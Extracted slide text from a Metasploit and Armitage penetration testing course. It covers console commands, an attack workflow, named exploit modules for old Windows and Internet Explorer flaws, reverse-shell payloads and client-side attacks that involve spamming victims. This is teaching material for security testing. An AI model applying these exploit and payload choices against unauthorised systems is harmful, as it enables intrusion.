3Overview Personal Introduction Penetration Testing Process Course Overview
4Introduction – R. Mudge Previous Experiences Other Experiences Penetration TesterRegional CCDC Red Team x 5USAF Security ResearcherArmitage for MetasploitOther ExperiencesWordPress Grammar CheckerProgramming Language
5What? Test security by doing what bad guys might do Penetration TestingWhat? Test security by doing what bad guys might do
6Why? Motivate desire to make changes to improve security Penetration TestingWhy? Motivate desire to make changes to improve security
25Console Cheat Sheetuse module - start configuring module show options - show configurable options set varname value - set option exploit - launch exploit module run - launch non-exploit sessions –i n - interact with a session help command - get help for a command
26msfconsoleOpen endedWorks in many placesOne task / host at a time
27What is Armitage?A GUI for MetasploitGoal: Avoid this…
35Remote Attack NMap Scan Analyze Scan Data Choose an Exploit Select a PayloadLaunch Exploit!
36Which exploit do I use? Answer: These. NameWherems08_067_netapiWindows XP/2003 erams09_050_smb2_negot..Windows Vista SP1/SP2ms03_026_dcomWindows 2000
37Why did my exploit fail? Firewall Non-vulnerable software Service is hungThe universe is taunting youNon-reliable exploitBad dayMis-configured exploitCould not establish session
38Exploit-free Attack Choose a payload Generate executable Set up a multi/handler
39Payloads Name Note windows/meterpreter/reverse_tcp Connects to one portwindows/meterpreter/reverse_tcp_allportsTries every ports in sequencewindows/meterpreter/reverse_httpsSpeaks HTTPS (!!!!)java/meterpreter/reverse_tcpAny platform with Javalinux/x86//shell_reverse_tcposx/x86/shell_reverse_tcp
40Client-side Attack Fingerprint sample of victims Choose an Exploit Launch ExpoitSpam victims (or wait for them)!
41Which exploit do I use? Answer: These. NameWherejava_signed_appletSocial engineering; any where Java applets runms11_003_ie_css_importInternet Explorer 7/8 (requires .NET)ie_createobjectInternet Explorer 6
42Which module listens for a connection from a payload? Learning CheckWhich module listens for a connection from a payload?Which exploit works against Windows XP SP2, port 445?
43Armitage and Metasploit Penetration Testing Lab Post-Exploitation
44Overview Command Shell Privilege Escalation Spying on the User File ManagementProcess ManagementPost Modules and Loot